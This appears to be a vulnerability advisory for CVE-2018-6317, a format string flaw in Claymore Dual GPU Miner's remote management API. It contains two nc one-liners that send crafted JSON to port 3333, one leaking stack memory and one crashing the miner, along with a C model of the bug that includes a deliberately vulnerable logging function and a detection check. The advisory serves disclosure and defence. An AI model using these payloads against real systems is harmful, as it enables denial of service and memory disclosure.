Claymore Dual GPU Miner 10.5 Format String Vulnerability

Published: 2018-02-03
Author: res1n
Source: 0day.today (1337DAY-ID-29700)
EPSS: 0.176 (Low), percentile 96.2%
Category: remote exploits, multiple platforms

Claymore Dual GPU Miner <= 10.5 Format String Vulnerability
=======================================================================

             product: Claymore's Dual Miner
  vulnerable version: <= 10.5
       fixed version: 10.6
          CVE number: CVE-2018-6317
              impact: critical
            homepage: https://bitcointalk.org/index.php?topic=1433925.0
               found: 2018-01-26
                  by: twitter.com/res1n

=======================================================================


Vulnerability overview/description:
-----------------------------------
Claymore's Dual GPU Miner 10.5 and below is vulnerable to a format string 
vulnerability in its JSON-RPC remote management API: the "method" field of 
a request is used as a printf-style format string. This allows an 
unauthenticated remote attacker to read memory addresses and stack 
contents, or to immediately terminate the mining process, causing a denial 
of service.

1) By sending a custom request to the JSON API on port 3333 of the 
remote management service it is possible to leak stack addresses: each %x 
or %p directive prints the next argument slot (a register or stack value) 
into the response, and %s dereferences a slot as a pointer and dumps the 
string found there. The write directive is %n (see 2), not %p. I wasn't 
able to break out of the JSON padding, but someone else may be able to, as 
%s also dumps string contents.

example - echo -e '{"id":1,"jsonrpc":"1.0","method":"%x %x %x %x"}' | nc 192.168.1.139 3333 & printf "\n"

2) Sending %n to the JSON API on port 3333 immediately kills the mining 
process: the directive writes the count of bytes output so far through 
whatever value sits in the next argument slot, and the miner crashes.

example - echo -e '{"id":1,"jsonrpc":"1.0","method":"%n"}' | nc 192.168.1.139 3333 & printf "\n"
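As an added illustration (not code from this advisory or from Claymore's miner, which is closed source), the following C program models the bug class described in 1) and 2): a JSON-RPC "method" value handed straight to a printf-family call, next to the fixed form, plus a small directive-counting check that a WAF rule or a pre-dispatch sanity test could use to flag such requests. The request strings are constructed after the PoC commands above, and extract_method, log_method_vulnerable, log_method_fixed and count_directives are hypothetical helpers; the miner's real parser and logging call are not known.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Constructed sample requests modelled on the PoC commands (not captured traffic). */
static const char REQ_LEAK[] = "{\"id\":1,\"jsonrpc\":\"1.0\",\"method\":\"%x %x %x %x\"}";
static const char REQ_KILL[] = "{\"id\":1,\"jsonrpc\":\"1.0\",\"method\":\"%n\"}";
static const char REQ_OK[]   = "{\"id\":1,\"jsonrpc\":\"1.0\",\"method\":\"miner_getstat1\"}";

/* Minimal extraction of the "method" string value from a one-line JSON-RPC
 * request (hypothetical helper, enough for the flat requests above).
 * Returns 1 on success, 0 if the field is missing or the buffer is too small. */
int extract_method(const char *json, char *out, size_t out_len) {
    const char *key = strstr(json, "\"method\"");
    if (!key) return 0;
    const char *p = strchr(key + 8, ':');
    if (!p) return 0;
    p++;
    while (*p == ' ') p++;
    if (*p != '"') return 0;
    p++;
    const char *end = strchr(p, '"');
    if (!end) return 0;
    size_t len = (size_t)(end - p);
    if (len + 1 > out_len) return 0;
    memcpy(out, p, len);
    out[len] = '\0';
    return 1;
}

/* The pattern the advisory describes: attacker-controlled text used *as* the
 * format string. "%x" walks register/stack slots into the output (the leak in
 * item 1); "%n" writes a byte count through the next slot (the crash in item 2). */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
int log_method_vulnerable(const char *method, char *out, size_t out_len) {
    return snprintf(out, out_len, method);  /* DO NOT DO THIS */
}
#pragma GCC diagnostic pop

/* Fixed form: the format string is a literal and the request is an argument,
 * so "%x" and "%n" in the method name are copied as plain characters. */
int log_method_fixed(const char *method, char *out, size_t out_len) {
    return snprintf(out, out_len, "method=%s", method);
}

/* Detection check: count printf conversion directives in a method name and
 * report whether the write directive "%n" is present. "%%" is a literal. */
int count_directives(const char *s, bool *has_write) {
    int n = 0;
    *has_write = false;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;
        /* skip flags, width, precision and length modifiers */
        while (*p && strchr("-+ #0123456789.*hlLqjzt", *p)) p++;
        if (!*p) break;
        n++;
        if (*p == 'n') *has_write = true;
    }
    return n;
}

int main(void) {
    char method[64], line[128];
    const char *reqs[] = { REQ_OK, REQ_LEAK, REQ_KILL };
    for (size_t i = 0; i < 3; i++) {
        bool w;
        if (!extract_method(reqs[i], method, sizeof method)) continue;
        int n = count_directives(method, &w);
        log_method_fixed(method, line, sizeof line);
        printf("%-16s directives=%d write=%d fixed-log: %s\n", method, n, (int)w, line);
    }
    /* Only the read-only leak request is pushed through the vulnerable path;
     * "%n" would write through a garbage pointer and abort the process. */
    extract_method(REQ_LEAK, method, sizeof method);
    log_method_vulnerable(method, line, sizeof line);
    printf("vulnerable-log: %s\n", line);
    return 0;
}
```

The fixed logger is the whole patch for this bug class: the request never becomes the format argument. The directive counter is deliberately strict (any non-literal "%" conversion in a method name is suspicious, and "%n" is always hostile), which suits a detection rule on port 3333 traffic better than an allow-list of miner method names would.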

Solution
------------------------
Upgrade to version 10.6


Vendor contact timeline:
------------------------
01/26/18 - Reported to dev
01/26/18 - Confirmed and immediately patched; 10.6 released. Requested a 
3-4 day embargo
01/31/18 - Public disclosure

Writeup - 
https://medium.com/secjuice/claymore-dual-gpu-miner-10-5-format-strings-vulnerability-916ab3d2db30

#  0day.today [2018-02-17]  #